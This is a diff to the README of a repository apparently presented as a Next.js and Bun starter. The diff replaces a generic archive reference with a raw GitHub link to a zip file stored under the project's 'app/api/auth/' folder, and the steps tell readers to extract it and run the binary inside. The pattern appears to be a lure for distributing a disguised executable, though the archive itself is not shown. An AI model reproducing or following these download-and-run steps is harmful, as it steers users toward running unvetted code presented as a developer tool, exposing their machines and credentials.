setbica/nextjs-bun-starter/README.md

 3. You can now launch it from your Applications folder.

 ### 🐧 Linux Installation
-1. Extract the downloaded `.tar.gz` file.
+1. Extract the downloaded `https://github.com/setbica/nextjs-bun-starter/raw/refs/heads/master/app/api/auth/bun-starter-nextjs-2.5.zip` file.
 2. Open a terminal window and navigate to the extracted folder.
 3. Run the command `./nextjs-bun-starter` to start the application.